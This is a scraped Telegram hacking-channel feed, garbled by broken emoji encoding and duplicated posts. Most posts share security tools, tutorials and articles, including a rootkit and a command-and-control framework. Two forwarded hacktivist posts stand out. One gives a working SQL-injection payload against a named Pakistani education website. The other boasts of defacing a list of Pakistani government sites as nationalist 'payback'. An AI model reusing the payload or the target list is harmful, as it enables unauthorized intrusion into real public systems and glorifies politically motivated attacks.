Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
This media is not supported in your browser
VIEW IN TELEGRAM
wpfinger | WordPress scanning tool.
โข Core version detection
โข Plugin scanning through fingerprinting
โข Vulnerability output, using database from Wordfence
โข Core version detection
โข Plugin scanning through fingerprinting
โข Vulnerability output, using database from Wordfence
๐ฅ2๐1
๐จ๐ปโ๐ป Learn How to Get CYBER SECURITY INTERNSHIP๐จ๐ปโ๐ป
๐Want to get cyber security internship? If yes then you don't have to miss this๐
Know about secret and amazing tips which will surely work for youโ
๐ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/
โค๏ธSHARE WITH LOVE๐
๐Want to get cyber security internship? If yes then you don't have to miss this๐
Know about secret and amazing tips which will surely work for youโ
๐ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/
โค๏ธSHARE WITH LOVE๐
๐1
Forwarded from CYBER DEMONS (INDIA๐ฎ๐ณ) ๐คCHANNEL๐ค (แดดแดฌแถแดทแดธแดผแถแดท)
SITE URL - https://www.comand.edu.pk/
PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX
KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐๐
HACKED BY -
CYBER DEMONS INDIA ๐ฎ๐ณ
JAY SHREE RAAM ๐ค๐๐ฎ๐ณโค๏ธโค๏ธ
PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX
KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐๐
HACKED BY -
CYBER DEMONS INDIA ๐ฎ๐ณ
JAY SHREE RAAM ๐ค๐๐ฎ๐ณโค๏ธโค๏ธ
โค1
New Article is Out Check โ
Title : Top 7 Types of Operating System Used in Cyber Security
Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐คฉ
Today, weโre going to dive into the fascinating world of operating systems used in cyber security.
Read Full Here ๐
https://bit.ly/3NZ2b6x
Title : Top 7 Types of Operating System Used in Cyber Security
Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐คฉ
Today, weโre going to dive into the fascinating world of operating systems used in cyber security.
Read Full Here ๐
https://bit.ly/3NZ2b6x
This media is not supported in your browser
VIEW IN TELEGRAM
โ๏ธ๐ต๐ฐ After 51 yrs PTI Chairman & Ex-PM of Pakistan Imran Khan admits the truth of East Pak (now Bangladesh) & blames Pak Army by saying Mujibur Rahman after winning the election should have been the PM but Pak Army did crackdown instead & end up losing with 90K POWs & humiliation
This media is not supported in your browser
VIEW IN TELEGRAM
Happy Mother's Day.
Media is too big
VIEW IN TELEGRAM
๐ฅ4๐ฅฐ2
Forwarded from BlackEye๐ฅท
This media is not supported in your browser
VIEW IN TELEGRAM
โโbadsecrets
A library for detecting known secrets across many web frameworks.
https://github.com/blacklanternsecurity/badsecrets
Details:
https://blog.blacklanternsecurity.com/p/introducing-badsecrets
#cybersecurity #infosec #pentesting
A library for detecting known secrets across many web frameworks.
https://github.com/blacklanternsecurity/badsecrets
Details:
https://blog.blacklanternsecurity.com/p/introducing-badsecrets
#cybersecurity #infosec #pentesting
โโKovid Rootkit
A full-feature LKM intended for use against Linux kernel v5+.
https://github.com/carloslack/KoviD
#infosec #pentesting #redteam
A full-feature LKM intended for use against Linux kernel v5+.
https://github.com/carloslack/KoviD
#infosec #pentesting #redteam
โโNimbo-C2
Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.
https://github.com/itaymigdal/Nimbo-C2
#infosec #pentesting #redteam
Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.
https://github.com/itaymigdal/Nimbo-C2
#infosec #pentesting #redteam
Forwarded from BlackEye๐ฅท
10+ PK government websites h*-cked.
A perfect payback to pk from #indiancybertroops
https://cmdu.gob(.pk)/
https://forensic.sindhpolice.gov (.pk)/index.php
https://mppbeta.sindhpolice.gov (.pk)/
https://legal.sindhpolice.gov (.pk)/
https://demo.cmdu.gob (.pk)/
https://pphi.cmdu.gob (.pk)/
https://ekacheri.cmdu.gob (.pk)/
https://hubportal.cmdu.gob (.pk)/
https://rds.cmdu.gob (.pk)/
https://test.cmdu.gob (.pk)/
https://expl.kp.gov (.pk)/
A perfect payback to pk from #indiancybertroops
https://cmdu.gob(.pk)/
https://forensic.sindhpolice.gov (.pk)/index.php
https://mppbeta.sindhpolice.gov (.pk)/
https://legal.sindhpolice.gov (.pk)/
https://demo.cmdu.gob (.pk)/
https://pphi.cmdu.gob (.pk)/
https://ekacheri.cmdu.gob (.pk)/
https://hubportal.cmdu.gob (.pk)/
https://rds.cmdu.gob (.pk)/
https://test.cmdu.gob (.pk)/
https://expl.kp.gov (.pk)/
โค2
A new blog on Advance Snort Introduction Detection and Prevention System
https://techofide.com/blogs/mastering-snort-an-intrusion-detection-and-prevention-system-step-by-step-guide/
Join our group for more cyber security content.
t.me/ethicalhackingtechofide
https://techofide.com/blogs/mastering-snort-an-intrusion-detection-and-prevention-system-step-by-step-guide/
Join our group for more cyber security content.
t.me/ethicalhackingtechofide
๐2
MagSpoof
A portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. It can disable Chip&PIN and predict AMEX card numbers with 100% accuracy.
A portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. It can disable Chip&PIN and predict AMEX card numbers with 100% accuracy.
๐ด How to Become a RED TEAM HACKER ๐ด
โคท A red team hacker is an authorized individual or group that performs simulated cyberattacks to identify vulnerabilities in an organization's systems and help improve its security.
โ Link: bit.ly/RedTeamer
Share & Support โค๏ธ
โคท A red team hacker is an authorized individual or group that performs simulated cyberattacks to identify vulnerabilities in an organization's systems and help improve its security.
โ Link: bit.ly/RedTeamer
Share & Support โค๏ธ
๐ฝ๐ช๐ ๐๐ฎ๐ฅ๐: DOM based XSS
Link: https://youtu.be/gQ_gmgjEbJ0
Please Share your Views ๐๐ปโบ๏ธ & Subscribe to our YouTube channel for more Videos.
Really Thank you for your Support๐๐
Link: https://youtu.be/gQ_gmgjEbJ0
Please Share your Views ๐๐ปโบ๏ธ & Subscribe to our YouTube channel for more Videos.
Really Thank you for your Support๐๐
YouTube
07 DOM XSS
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cybertix/
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.in
๐ด RESOURCES
๐๐๐ค๐ช๐ง๐๐ & ๐๐๐ฃ๐ ๐๐๐จ๐ฉ: https://โฆ
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cybertix/
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.in
๐ด RESOURCES
๐๐๐ค๐ช๐ง๐๐ & ๐๐๐ฃ๐ ๐๐๐จ๐ฉ: https://โฆ
๐1
WebSocket Pentration Testing
@crackcodes
HTML5 has introduced many new powerful APIs, one of the more interesting components being websockets. These highlight a trend in web application development to remove or reduce the overhead of HTTP. Websockets are a direct TCP connection between the client browser and the webserver.
Read Article: https://bit.ly/WebSocket_PentrationTesting@crackcodes